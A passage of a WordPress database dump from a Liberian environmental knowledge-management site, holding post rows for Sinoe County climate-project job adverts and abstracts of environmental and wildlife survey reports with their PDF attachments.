07:01:55','2022-08-03 07:01:55','<span id=\"page22R_mcid0\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The proposed project aims to build on existing projects to strengthen the resilience of vulnerable coastal </span><span dir=\"ltr\" role=\"presentation\">communities and their livelihoods to the impacts of climate change, focusing on women and youth. </span><span dir=\"ltr\" role=\"presentation\">Spec</span><span dir=\"ltr\" role=\"presentation\">ifically, project interventions include: i) strengthening institutional capacity for climate change </span><span dir=\"ltr\" role=\"presentation\">adaptation planning; ii) supporting innovative technologies for climate information and communication </span><span dir=\"ltr\" role=\"presentation\">management;</span> <span dir=\"ltr\" role=\"presentation\">iii)</span> <span dir=\"ltr\" role=\"presentation\">introducing</span> <span dir=\"ltr\" role=\"presentation\">hybrid</span> <span dir=\"ltr\" role=\"presentation\">adaptation</span> <span dir=\"ltr\" role=\"presentation\">solutio</span><span dir=\"ltr\" role=\"presentation\">ns;</span> <span dir=\"ltr\" role=\"presentation\">and</span> <span dir=\"ltr\" role=\"presentation\">iv)</span> <span dir=\"ltr\" role=\"presentation\">supporting</span> <span dir=\"ltr\" role=\"presentation\">resilient</span> <span dir=\"ltr\" role=\"presentation\">livelihood </span><span dir=\"ltr\" role=\"presentation\">diversification through training and improved access to finance.</span></span>\r\n\r\n<strong><em>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/08/PMU-ADVERT-websites-EDITED.pdf\" target=\"_blank\" rel=\"noopener\">Project Assistant Wanted</a></em></strong>','Recruitment for Project Assistant for Sinoe County Project','','inherit','closed','closed','','4830-revision-v1','','','2022-08-03 07:01:55','2022-08-03 07:01:55','',4830,'https://ekmsliberia.info/?p=4850',0,'revision','',0),(4851,42,'2022-08-03 07:02:41','2022-08-03 07:02:41','<span id=\"page22R_mcid0\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The proposed project aims to build on existing projects to strengthen the resilience of vulnerable coastal </span><span dir=\"ltr\" role=\"presentation\">communities and their livelihoods to the impacts of climate change, focusing on women and youth. </span><span dir=\"ltr\" role=\"presentation\">Spec</span><span dir=\"ltr\" role=\"presentation\">ifically, project interventions include: i) strengthening institutional capacity for climate change </span><span dir=\"ltr\" role=\"presentation\">adaptation planning; ii) supporting innovative technologies for climate information and communication </span><span dir=\"ltr\" role=\"presentation\">management;</span> <span dir=\"ltr\" role=\"presentation\">iii)</span> <span dir=\"ltr\" role=\"presentation\">introducing</span> <span dir=\"ltr\" role=\"presentation\">hybrid</span> <span dir=\"ltr\" role=\"presentation\">adaptation</span> <span dir=\"ltr\" role=\"presentation\">solutio</span><span dir=\"ltr\" role=\"presentation\">ns;</span> <span dir=\"ltr\" role=\"presentation\">and</span> <span dir=\"ltr\" role=\"presentation\">iv)</span> <span dir=\"ltr\" role=\"presentation\">supporting</span> <span dir=\"ltr\" role=\"presentation\">resilient</span> <span dir=\"ltr\" role=\"presentation\">livelihood </span><span dir=\"ltr\" role=\"presentation\">diversification through training and improved access to finance.</span></span>\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/08/PMU-ADVERT-websites-EDITED.pdf\" target=\"_blank\" rel=\"noopener\">CTA Wanted</a></strong></em>','Recruitment for Chief Technical Advisor for Sinoe County Project','','inherit','closed','closed','','4832-revision-v1','','','2022-08-03 07:02:41','2022-08-03 07:02:41','',4832,'https://ekmsliberia.info/?p=4851',0,'revision','',0),(4852,42,'2022-08-03 07:03:33','2022-08-03 07:03:33','The proposed project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include: i) strengthening institutional capacity for climate change adaptation planning; ii) supporting innovative technologies for climate information and communication management; iii) introducing hybrid adaptation solutions; and iv) supporting resilient livelihood diversification through training and improved access to finance.\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/08/PMU-ADVERT-websites-EDITED.pdf\" target=\"_blank\" rel=\"noopener\">Consultant Wanted</a></strong></em>','Recruitment for Project Administration & Finance Officer for Sinoe County Project','','inherit','closed','closed','','4835-revision-v1','','','2022-08-03 07:03:33','2022-08-03 07:03:33','',4835,'https://ekmsliberia.info/?p=4852',0,'revision','',0),(4853,42,'2022-08-03 07:04:17','2022-08-03 07:04:17','The proposed project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include: i) strengthening institutional capacity for climate change adaptation planning; ii) supporting innovative technologies for climate information and communication management; iii) introducing hybrid adaptation solutions; and iv) supporting resilient livelihood diversification through training and improved access to finance.\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/08/PMU-ADVERT-websites-EDITED.pdf\" target=\"_blank\" rel=\"noopener\">Procurement Officer Wanted</a></strong></em>','Recruitment for Procurement Officer for Sinoe County Project','','inherit','closed','closed','','4837-revision-v1','','','2022-08-03 07:04:17','2022-08-03 07:04:17','',4837,'https://ekmsliberia.info/?p=4853',0,'revision','',0),(4854,42,'2022-08-03 07:04:52','2022-08-03 07:04:52','The proposed project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include: i) strengthening institutional capacity for climate change adaptation planning; ii) supporting innovative technologies for climate information and communication management; iii) introducing hybrid adaptation solutions; and iv) supporting resilient livelihood diversification through training and improved access to finance.\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/08/PMU-ADVERT-websites-EDITED.pdf\" target=\"_blank\" rel=\"noopener\">M&amp;E Officer Wanted</a></strong></em>','Recruitment for Monitoring & Evaluation Officer for Sinoe County Project','','inherit','closed','closed','','4840-revision-v1','','','2022-08-03 07:04:52','2022-08-03 07:04:52','',4840,'https://ekmsliberia.info/?p=4854',0,'revision','',0),(4855,42,'2022-08-03 07:05:35','2022-08-03 07:05:35','The proposed project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include: i) strengthening institutional capacity for climate change adaptation planning; ii) supporting innovative technologies for climate information and communication management; iii) introducing hybrid adaptation solutions; and iv) supporting resilient livelihood diversification through training and improved access to finance.\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/08/PMU-ADVERT-websites-EDITED.pdf\" target=\"_blank\" rel=\"noopener\">Gender Officer Wanted</a></strong></em>','Recruitment for Gender Officer for Sinoe County Project','','inherit','closed','closed','','4842-revision-v1','','','2022-08-03 07:05:35','2022-08-03 07:05:35','',4842,'https://ekmsliberia.info/?p=4855',0,'revision','',0),(4856,42,'2022-08-03 07:06:16','2022-08-03 07:06:16','The proposed project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include: i) strengthening institutional capacity for climate change adaptation planning; ii) supporting innovative technologies for climate information and communication management; iii) introducing hybrid adaptation solutions; and iv) supporting resilient livelihood diversification through training and improved access to finance.\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/08/PMU-ADVERT-websites-EDITED.pdf\" target=\"_blank\" rel=\"noopener\">Safeguard Officer Wanted</a></strong></em>','Recruitment for Safeguard Officer for Sinoe County Project','','inherit','closed','closed','','4845-revision-v1','','','2022-08-03 07:06:16','2022-08-03 07:06:16','',4845,'https://ekmsliberia.info/?p=4856',0,'revision','',0),(4858,42,'2022-08-10 10:59:38','2022-08-10 10:59:38','On assignment by Golden Veroleum (Liberia), Inc. (GVL) from the 5th of December 2013 to the 7th of January 2014, the Wild Chimpanzee Foundation (WCF) led a chimpanzee and large mammal survey in the Kpayan district Gross Concession area (for reference on terminology related to area refer to Appendix 1). Using IUCN standards for transect surveys of great apes; a sampling design was created to cover the whole of the EPA permit area. Data was collected along 54 linear transects of 1 km for chimpanzees, large mammals and anthropogenic pressure. From the data collected, we could estimate a total population of 48 chimpanzees in the 15,000\r\nhectares area of field investigation, of which an estimated 14 chimpanzees can be found in the 8,000 hectare RSPO permit area.','Report on the Chimpanzee and Large Mammal Survey in the Kpayan Gross Concession Area','','publish','closed','closed','','report-on-the-chimpanzee-and-large-mammal-survey-in-the-kpayan-gross-concession-area','','','2022-08-10 10:59:38','2022-08-10 10:59:38','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4858',56,'document','',0),(4859,42,'2022-08-10 10:56:05','2022-08-10 10:56:05','','2014_gvl_report_','','inherit','open','closed','','2014_gvl_report_-3','','','2022-08-10 10:56:05','2022-08-10 10:56:05','',4858,'https://ekmsliberia.info/wp-content/uploads/2022/08/2014_gvl_report_.pdf',0,'attachment','application/pdf',0),(4860,42,'2022-08-10 10:57:56','2022-08-10 10:57:56','','Untitled','','inherit','open','closed','','untitled-9','','','2022-08-10 10:57:56','2022-08-10 10:57:56','',4858,'https://ekmsliberia.info/wp-content/uploads/2022/08/Untitled.png',0,'attachment','image/png',0),(4861,42,'2022-08-10 10:59:38','2022-08-10 10:59:38','On assignment by Golden Veroleum (Liberia), Inc. (GVL) from the 5th of December 2013 to the 7th of January 2014, the Wild Chimpanzee Foundation (WCF) led a chimpanzee and large mammal survey in the Kpayan district Gross Concession area (for reference on terminology related to area refer to Appendix 1). Using IUCN standards for transect surveys of great apes; a sampling design was created to cover the whole of the EPA permit area. Data was collected along 54 linear transects of 1 km for chimpanzees, large mammals and anthropogenic pressure. From the data collected, we could estimate a total population of 48 chimpanzees in the 15,000\r\nhectares area of field investigation, of which an estimated 14 chimpanzees can be found in the 8,000 hectare RSPO permit area.','Report on the Chimpanzee and Large Mammal Survey in the Kpayan Gross Concession Area','','inherit','closed','closed','','4858-revision-v1','','','2022-08-10 10:59:38','2022-08-10 10:59:38','',4858,'https://ekmsliberia.info/?p=4861',0,'revision','',0),(4862,42,'2022-08-10 11:09:21','2022-08-10 11:09:21','<span id=\"page4R_mcid3\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">Recently, there has been a revolution in the availability of </span><span dir=\"ltr\" role=\"presentation\">information and in the development and application of </span><span dir=\"ltr\" role=\"presentation\">tools for managing information. Information needs for</span><br role=\"presentation\" /><span dir=\"ltr\" role=\"presentation\">biodiversity are many and varied. Any database that deals </span><span dir=\"ltr\" role=\"presentation\">with biodiversity information has to be geographically </span><span dir=\"ltr\" role=\"presentation\">based, and able to predict where new populations of </span><span dir=\"ltr\" role=\"presentation\">endangered species with a limited known range might be </span><span dir=\"ltr\" role=\"presentation\">expected, indicating potential hot spots.</span></span>','Overview of Spatial Dataset for Liberia’s GNR','','publish','closed','closed','','overview-of-spatial-dataset-for-liberias-gnr','','','2022-08-10 11:09:21','2022-08-10 11:09:21','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4862',55,'document','',0),(4863,42,'2022-08-10 11:01:45','2022-08-10 11:01:45','','CBD LIBERIA’ map','','inherit','open','closed','','cbd-liberia-map-2','','','2022-08-10 11:01:45','2022-08-10 11:01:45','',4862,'https://ekmsliberia.info/wp-content/uploads/2022/08/CBD-LIBERIA-map.pdf',0,'attachment','application/pdf',0),(4864,42,'2022-08-10 11:05:18','2022-08-10 11:05:18','','Untitled','','inherit','open','closed','','untitled-10','','','2022-08-10 11:05:18','2022-08-10 11:05:18','',4862,'https://ekmsliberia.info/wp-content/uploads/2022/08/Untitled-1.png',0,'attachment','image/png',0),(4865,42,'2022-08-10 11:09:21','2022-08-10 11:09:21','<span id=\"page4R_mcid3\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">Recently, there has been a revolution in the availability of </span><span dir=\"ltr\" role=\"presentation\">information and in the development and application of </span><span dir=\"ltr\" role=\"presentation\">tools for managing information. Information needs for</span><br role=\"presentation\" /><span dir=\"ltr\" role=\"presentation\">biodiversity are many and varied. Any database that deals </span><span dir=\"ltr\" role=\"presentation\">with biodiversity information has to be geographically </span><span dir=\"ltr\" role=\"presentation\">based, and able to predict where new populations of </span><span dir=\"ltr\" role=\"presentation\">endangered species with a limited known range might be </span><span dir=\"ltr\" role=\"presentation\">expected, indicating potential hot spots.</span></span>','Overview of Spatial Dataset for Liberia’s GNR','','inherit','closed','closed','','4862-revision-v1','','','2022-08-10 11:09:21','2022-08-10 11:09:21','',4862,'https://ekmsliberia.info/?p=4865',0,'revision','',0),(4866,42,'2022-08-10 11:53:44','2022-08-10 11:53:44','<span dir=\"ltr\" role=\"presentation\">Biological diversity—or biodiversity—is the term given to the variety of life on </span><span dir=\"ltr\" role=\"presentation\">Earth, including plants, animals and micro-organisms, as well as the ecosystems of</span><br role=\"presentation\" /><span dir=\"ltr\" role=\"presentation\">which they are part. Biodiversity includes genetic differences within species, the </span><span dir=\"ltr\" role=\"presentation\">diversity of species and the variety of ecosystems. It is the result of the interaction</span><br role=\"presentation\" /><span dir=\"ltr\" role=\"presentation\">of species, including humans, with one another and with the air, water and soil </span><span dir=\"ltr\" role=\"presentation\">around them. This combination of life forms—ecosystems, species and genetic vari</span><span dir=\"ltr\" role=\"presentation\">eties—has made Earth a uniquely habitable place and provides the goods and ser</span><span dir=\"ltr\" role=\"presentation\">vices that sustain our lives, such as clean air and water, food and medicine, fuel, </span><span dir=\"ltr\" role=\"presentation\">fibre, and material for construction. Our cultures are founded upon the different </span><span dir=\"ltr\" role=\"presentation\">environments in which they have developed.</span>','Handbook on the Convention on Biological Diversity','','publish','closed','closed','','handbook-on-the-convention-on-biological-diversity','','','2022-08-10 11:53:44','2022-08-10 11:53:44','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4866',54,'document','',0),(4867,42,'2022-08-10 11:18:06','2022-08-10 11:18:06','','cbd1235','','inherit','open','closed','','cbd1235','','','2022-08-10 11:18:06','2022-08-10 11:18:06','',4866,'https://ekmsliberia.info/wp-content/uploads/2022/08/cbd1235.pdf',0,'attachment','application/pdf',0),(4868,42,'2022-08-10 11:40:39','2022-08-10 11:40:39','','Untitled','','inherit','open','closed','','untitled-11','','','2022-08-10 11:40:39','2022-08-10 11:40:39','',4866,'https://ekmsliberia.info/wp-content/uploads/2022/08/Untitled-2.png',0,'attachment','image/png',0),(4869,42,'2022-08-10 11:53:44','2022-08-10 11:53:44','<span dir=\"ltr\" role=\"presentation\">Biological diversity—or biodiversity—is the term given to the variety of life on </span><span dir=\"ltr\" role=\"presentation\">Earth, including plants, animals and micro-organisms, as well as the ecosystems of</span><br role=\"presentation\" /><span dir=\"ltr\" role=\"presentation\">which they are part. Biodiversity includes genetic differences within species, the </span><span dir=\"ltr\" role=\"presentation\">diversity of species and the variety of ecosystems. It is the result of the interaction</span><br role=\"presentation\" /><span dir=\"ltr\" role=\"presentation\">of species, including humans, with one another and with the air, water and soil </span><span dir=\"ltr\" role=\"presentation\">around them. This combination of life forms—ecosystems, species and genetic vari</span><span dir=\"ltr\" role=\"presentation\">eties—has made Earth a uniquely habitable place and provides the goods and ser</span><span dir=\"ltr\" role=\"presentation\">vices that sustain our lives, such as clean air and water, food and medicine, fuel, </span><span dir=\"ltr\" role=\"presentation\">fibre, and material for construction. Our cultures are founded upon the different </span><span dir=\"ltr\" role=\"presentation\">environments in which they have developed.</span>','Handbook on the Convention on Biological Diversity','','inherit','closed','closed','','4866-revision-v1','','','2022-08-10 11:53:44','2022-08-10 11:53:44','',4866,'https://ekmsliberia.info/?p=4869',0,'revision','',0),(4870,42,'2022-08-10 15:23:00','2022-08-10 15:23:00','<span dir=\"ltr\" role=\"presentation\">Liberia institutional crisis reflected the small cohesion of a country where urban growth in the </span><span dir=\"ltr\" role=\"presentation\">coastal area is achieved by human and natural resources depletion in the interior. Economic </span><span dir=\"ltr\" role=\"presentation\">depression and decomposition of governance opened the way to an increased and fuzzy </span><span dir=\"ltr\" role=\"presentation\">exploitation of natural resources and degradation of human settlements environment. With the </span><span dir=\"ltr\" role=\"presentation\">progress of the peace process, the main goals of institutions and the Liberian society as a whole </span><span dir=\"ltr\" role=\"presentation\">have become the enhancement of national cohesion through governance and the improvement of </span><span dir=\"ltr\" role=\"presentation\">livelihood through economic expansion. In short, Liberia economic and social converge on the</span><br role=\"presentation\" /><span dir=\"ltr\" role=\"presentation\">reduction of poverty.</span>','Liberia\'s Environmental Profile','','publish','closed','closed','','liberias-environmental-profile','','','2022-08-10 15:23:00','2022-08-10 15:23:00','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4870',53,'document','',0),(4871,42,'2022-08-10 11:54:37','2022-08-10 11:54:37','','cep_liberia_2006_','','inherit','open','closed','','cep_liberia_2006_-2','','','2022-08-10 11:54:37','2022-08-10 11:54:37','',4870,'https://ekmsliberia.info/wp-content/uploads/2022/08/cep_liberia_2006_.pdf',0,'attachment','application/pdf',0),(4872,42,'2022-08-10 15:19:55','2022-08-10 15:19:55','','Untitled','','inherit','open','closed','','untitled-12','','','2022-08-10 15:19:55','2022-08-10 15:19:55','',4870,'https://ekmsliberia.info/wp-content/uploads/2022/08/Untitled-3.png',0,'attachment','image/png',0),(4873,42,'2022-08-10 15:23:00','2022-08-10 15:23:00','<span dir=\"ltr\" role=\"presentation\">Liberia institutional crisis reflected the small cohesion of a country where urban growth in the </span><span dir=\"ltr\" role=\"presentation\">coastal area is achieved by human and natural resources depletion in the interior. Economic </span><span dir=\"ltr\" role=\"presentation\">depression and decomposition of governance opened the way to an increased and fuzzy </span><span dir=\"ltr\" role=\"presentation\">exploitation of natural resources and degradation of human settlements environment. With the </span><span dir=\"ltr\" role=\"presentation\">progress of the peace process, the main goals of institutions and the Liberian society as a whole </span><span dir=\"ltr\" role=\"presentation\">have become the enhancement of national cohesion through governance and the improvement of </span><span dir=\"ltr\" role=\"presentation\">livelihood through economic expansion. In short, Liberia economic and social converge on the</span><br role=\"presentation\" /><span dir=\"ltr\" role=\"presentation\">reduction of poverty.</span>','Liberia\'s Environmental Profile','','inherit','closed','closed','','4870-revision-v1','','','2022-08-10 15:23:00','2022-08-10 15:23:00','',4870,'https://ekmsliberia.info/?p=4873',0,'revision','',0),(4874,42,'2022-08-10 15:33:47','2022-08-10 15:33:47','<span dir=\"ltr\" role=\"presentation\">The Environmental Protection and Management Law (EPML)</span> <span dir=\"ltr\" role=\"presentation\">provides</span> <span dir=\"ltr\" role=\"presentation\">for a wide </span><span dir=\"ltr\" role=\"presentation\">ranging responsibility for environmental management by the EPA.</span> <span dir=\"ltr\" role=\"presentation\">One of the most</span><br role=\"presentation\" /><span dir=\"ltr\" role=\"presentation\">prominent</span> <span dir=\"ltr\" role=\"presentation\">mandates</span> <span dir=\"ltr\" role=\"presentation\">is the need for development of administrative proced</span><span dir=\"ltr\" role=\"presentation\">ures for the </span><span dir=\"ltr\" role=\"presentation\">preparation of</span> <span dir=\"ltr\" role=\"presentation\">ESIA</span> <span dir=\"ltr\" role=\"presentation\">to ensure effective environmental governance.</span> <span dir=\"ltr\" role=\"presentation\">The required </span><span dir=\"ltr\" role=\"presentation\">administrative procedures and how they are arranged to reflect the intent of the law is </span><span dir=\"ltr\" role=\"presentation\">the</span> <span dir=\"ltr\" role=\"presentation\">subject</span> <span dir=\"ltr\" role=\"presentation\">of</span> <span dir=\"ltr\" role=\"presentation\">the</span> <span dir=\"ltr\" role=\"presentation\">following</span> <span dir=\"ltr\" role=\"presentation\">guidelines.</span> <span dir=\"ltr\" role=\"presentation\">These</span> <span dir=\"ltr\" role=\"presentation\">Guidelines</span> <span dir=\"ltr\" role=\"presentation\">will</span> <span dir=\"ltr\" role=\"presentation\">be</span> <span dir=\"ltr\" role=\"presentation\">reviewed </span><span dir=\"ltr\" role=\"presentation\">periodically and updated when necessary</span>','ESIA Procedural Guideline 2017','','publish','closed','closed','','esia-procedural-guideline-2017','','','2022-08-10 16:10:14','2022-08-10 16:10:14','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4874',52,'document','',0),(4876,42,'2022-08-10 15:26:34','2022-08-10 15:26:34','','ESIA Procedural Guideline','','inherit','open','closed','','esia-procedural-guideline','','','2022-08-10 15:26:34','2022-08-10 15:26:34','',4874,'https://ekmsliberia.info/wp-content/uploads/2022/08/ESIA-Procedural-Guideline.pdf',0,'attachment','application/pdf',0),(4877,42,'2022-08-10 15:33:47','2022-08-10 15:33:47','<span dir=\"ltr\" role=\"presentation\">The Environmental Protection and Management Law (EPML)</span> <span dir=\"ltr\" role=\"presentation\">provides</span> <span dir=\"ltr\" role=\"presentation\">for a wide </span><span dir=\"ltr\" role=\"presentation\">ranging responsibility for environmental management by the EPA.</span> <span dir=\"ltr\" role=\"presentation\">One of the most</span><br role=\"presentation\" /><span dir=\"ltr\" role=\"presentation\">prominent</span> <span dir=\"ltr\" role=\"presentation\">mandates</span> <span dir=\"ltr\" role=\"presentation\">is the need for development of administrative proced</span><span dir=\"ltr\" role=\"presentation\">ures for the </span><span dir=\"ltr\" role=\"presentation\">preparation of</span> <span dir=\"ltr\" role=\"presentation\">ESIA</span> <span dir=\"ltr\" role=\"presentation\">to ensure effective environmental governance.</span> <span dir=\"ltr\" role=\"presentation\">The required </span><span dir=\"ltr\" role=\"presentation\">administrative procedures and how they are arranged to reflect the intent of the law is </span><span dir=\"ltr\" role=\"presentation\">the</span> <span dir=\"ltr\" role=\"presentation\">subject</span> <span dir=\"ltr\" role=\"presentation\">of</span> <span dir=\"ltr\" role=\"presentation\">the</span> <span dir=\"ltr\" role=\"presentation\">following</span> <span dir=\"ltr\" role=\"presentation\">guidelines.</span> <span dir=\"ltr\" role=\"presentation\">These</span> <span dir=\"ltr\" role=\"presentation\">Guidelines</span> <span dir=\"ltr\" role=\"presentation\">will</span> <span dir=\"ltr\" role=\"presentation\">be</span> <span dir=\"ltr\" role=\"presentation\">reviewed </span><span dir=\"ltr\" role=\"presentation\">periodically and updated when necessary</span>','ESIA Procedural Guideline 2017','','inherit','closed','closed','','4874-revision-v1','','','2022-08-10 15:33:47','2022-08-10 15:33:47','',4874,'https://ekmsliberia.info/?p=4877',0,'revision','',0),(4878,42,'2022-08-10 15:40:37','2022-08-10 15:40:37','<span dir=\"ltr\" role=\"presentation\">This report is an addendum to the Main Environmental and Social Impact Assessment (ESIA) </span><span dir=\"ltr\" role=\"presentation\">for the Western Range DSO Iron Ore Project (Phase 1) proposed by ArcelorMittal Liberia. In </span><span dir=\"ltr\" role=\"presentation\">order to fill gaps identified in the baseline surveys for the ESIA, additional zoological surveys </span><span dir=\"ltr\" role=\"presentation\">were commissioned by ArcelorMittal Liberia in 2010/2011. This report summarizes the principal </span><span dir=\"ltr\" role=\"presentation\">findings of those field surveys (in Section 2), and the recommendations arising from them (in </span><span dir=\"ltr\" role=\"presentation\">Section 3). The specialist reports themselves are provided as Annexes 1</span>','Addendum to Environmental and Social Impact Assessment: Additional Zoological Studies, Main Report','','publish','closed','closed','','addendum-to-environmental-and-social-impact-assessment-additional-zoological-studies-main-report','','','2022-08-10 15:40:37','2022-08-10 15:40:37','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4878',51,'document','',0),(4880,42,'2022-08-10 15:36:14','2022-08-10 15:36:14','','phase-1-esia-addendum-1-faunal-studies-main-report','','inherit','open','closed','','phase-1-esia-addendum-1-faunal-studies-main-report','','','2022-08-10 15:36:14','2022-08-10 15:36:14','',4878,'https://ekmsliberia.info/wp-content/uploads/2022/08/phase-1-esia-addendum-1-faunal-studies-main-report.pdf',0,'attachment','application/pdf',0),(4881,42,'2022-08-10 15:39:02','2022-08-10 15:39:02','','Untitled','','inherit','open','closed','','untitled-13','','','2022-08-10 15:39:02','2022-08-10 15:39:02','',4878,'https://ekmsliberia.info/wp-content/uploads/2022/08/Untitled-4.png',0,'attachment','image/png',0),(4882,42,'2022-08-10 15:40:37','2022-08-10 15:40:37','<span dir=\"ltr\" role=\"presentation\">This report is an addendum to the Main Environmental and Social Impact Assessment (ESIA) </span><span dir=\"ltr\" role=\"presentation\">for the Western Range DSO Iron Ore Project (Phase 1) proposed by ArcelorMittal Liberia. In </span><span dir=\"ltr\" role=\"presentation\">order to fill gaps identified in the baseline surveys for the ESIA, additional zoological surveys </span><span dir=\"ltr\" role=\"presentation\">were commissioned by ArcelorMittal Liberia in 2010/2011. This report summarizes the principal </span><span dir=\"ltr\" role=\"presentation\">findings of those field surveys (in Section 2), and the recommendations arising from them (in </span><span dir=\"ltr\" role=\"presentation\">Section 3). The specialist reports themselves are provided as Annexes 1</span>','Addendum to Environmental and Social Impact Assessment: Additional Zoological Studies, Main Report','','inherit','closed','closed','','4878-revision-v1','','','2022-08-10 15:40:37','2022-08-10 15:40:37','',4878,'https://ekmsliberia.info/?p=4882',0,'revision','',0),(4883,42,'2022-08-10 15:45:25','2022-08-10 15:45:25','This is a list of five Ramsar sites in Liberia','Annotated List of Wetlands of Importance in Liberia','','publish','closed','closed','','annotated-list-of-wetlands-of-importance-in-liberia','','','2022-08-10 15:45:25','2022-08-10 15:45:25','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4883',50,'document','',0),(4884,42,'2022-08-10 15:41:16','2022-08-10 15:41:16','','Ramsar-Sites-annotated-summary-Liberia','','inherit','open','closed','','ramsar-sites-annotated-summary-liberia','','','2022-08-10 15:41:16','2022-08-10 15:41:16','',4883,'https://ekmsliberia.info/wp-content/uploads/2022/08/Ramsar-Sites-annotated-summary-Liberia.pdf',0,'attachment','application/pdf',0),(4885,42,'2022-08-10 15:44:10','2022-08-10 15:44:10','','Untitled','','inherit','open','closed','','untitled-14','','','2022-08-10 15:44:10','2022-08-10 15:44:10','',4883,'https://ekmsliberia.info/wp-content/uploads/2022/08/Untitled-5.png',0,'attachment','image/png',0),(4886,42,'2022-08-10 15:45:25','2022-08-10 15:45:25','This is a list of five Ramsar sites in Liberia','Annotated List of Wetlands of Importance in Liberia','','inherit','closed','closed','','4883-revision-v1','','','2022-08-10 15:45:25','2022-08-10 15:45:25','',4883,'https://ekmsliberia.info/?p=4886',0,'revision','',0),(4887,42,'2022-08-10 15:45:58','2022-08-10 15:45:58','This is a list of five Ramsar sites in Liberia','Annotated List of Wetlands of Importance in Liberia','','inherit','closed','closed','','4883-autosave-v1','','','2022-08-10 15:45:58','2022-08-10 15:45:58','',4883,'https://ekmsliberia.info/?p=4887',0,'revision','',0),(4888,42,'2022-08-10 15:52:59','2022-08-10 15:52:59','<span dir=\"ltr\" role=\"presentation\">A recent survey of small carnivores in a commercial mining exploration concession at the Putu Mountains, southeast Liberia, </span><span dir=\"ltr\" role=\"presentation\">involved a broad area reconnaissance and camera-trapping. Camera-trap images of the recently described Bourlon’s Genet</span> <span dir=\"ltr\" role=\"presentation\">Gen</span><span dir=\"ltr\" role=\"presentation\">etta Bourloni</span> <span dir=\"ltr\" role=\"presentation\">are the first published images of living individuals in the wild. This species is perhaps well distributed in the study </span><span dir=\"ltr\" role=\"presentation\">area. Other small carnivore species found, including Honey Badger</span> <span dir=\"ltr\" role=\"presentation\">Mellivora capensis</span><span dir=\"ltr\" role=\"presentation\">, are described. Liberian Mongoose</span> <span dir=\"ltr\" role=\"presentation\">Liberi</span><span dir=\"ltr\" role=\"presentation\">ictis kuhni</span> <span dir=\"ltr\" role=\"presentation\">was not detected, but local reports suggest that it was historically present and may persist at low density.</span>','A Survey of Small Carnivores at Putu Mountains, Southeast Liberia','','publish','closed','closed','','a-survey-of-small-carnivores-at-putu-mountains-southeast-liberia','','','2022-08-10 15:52:59','2022-08-10 15:52:59','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4888',49,'document','',0),(4889,42,'2022-08-10 15:47:43','2022-08-10 15:47:43','','SCC48-3Greengrass2013-HR','','inherit','open','closed','','scc48-3greengrass2013-hr','','','2022-08-10 15:47:43','2022-08-10 15:47:43','',4888,'https://ekmsliberia.info/wp-content/uploads/2022/08/SCC48-3Greengrass2013-HR.pdf',0,'attachment','application/pdf',0),(4890,42,'2022-08-10 15:52:10','2022-08-10 15:52:10','','Untitled','','inherit','open','closed','','untitled-15','','','2022-08-10 15:52:10','2022-08-10 15:52:10','',4888,'https://ekmsliberia.info/wp-content/uploads/2022/08/Untitled-6.png',0,'attachment','image/png',0),(4891,42,'2022-08-10 15:52:59','2022-08-10 15:52:59','<span dir=\"ltr\" role=\"presentation\">A recent survey of small carnivores in a commercial mining exploration concession at the Putu Mountains, southeast Liberia, </span><span dir=\"ltr\" role=\"presentation\">involved a broad area reconnaissance and camera-trapping. Camera-trap images of the recently described Bourlon’s Genet</span> <span dir=\"ltr\" role=\"presentation\">Gen</span><span dir=\"ltr\" role=\"presentation\">etta Bourloni</span> <span dir=\"ltr\" role=\"presentation\">are the first published images of living individuals in the wild. This species is perhaps well distributed in the study </span><span dir=\"ltr\" role=\"presentation\">area. Other small carnivore species found, including Honey Badger</span> <span dir=\"ltr\" role=\"presentation\">Mellivora capensis</span><span dir=\"ltr\" role=\"presentation\">, are described. Liberian Mongoose</span> <span dir=\"ltr\" role=\"presentation\">Liberi</span><span dir=\"ltr\" role=\"presentation\">ictis kuhni</span> <span dir=\"ltr\" role=\"presentation\">was not detected, but local reports suggest that it was historically present and may persist at low density.</span>','A Survey of Small Carnivores at Putu Mountains, Southeast Liberia','','inherit','closed','closed','','4888-revision-v1','','','2022-08-10 15:52:59','2022-08-10 15:52:59','',4888,'https://ekmsliberia.info/?p=4891',0,'revision','',0),(4892,42,'2022-08-10 15:53:12','2022-08-10 15:53:12','<span dir=\"ltr\" role=\"presentation\">A recent survey of small carnivores in a commercial mining exploration concession at the Putu Mountains, southeast Liberia, </span><span dir=\"ltr\" role=\"presentation\">involved a broad area reconnaissance and camera-trapping. Camera-trap images of the recently described Bourlon’s Genet</span> <span dir=\"ltr\" role=\"presentation\">Gen</span><span dir=\"ltr\" role=\"presentation\">etta Bourloni</span> <span dir=\"ltr\" role=\"presentation\">are the first published images of living individuals in the wild. This species is perhaps well distributed in the 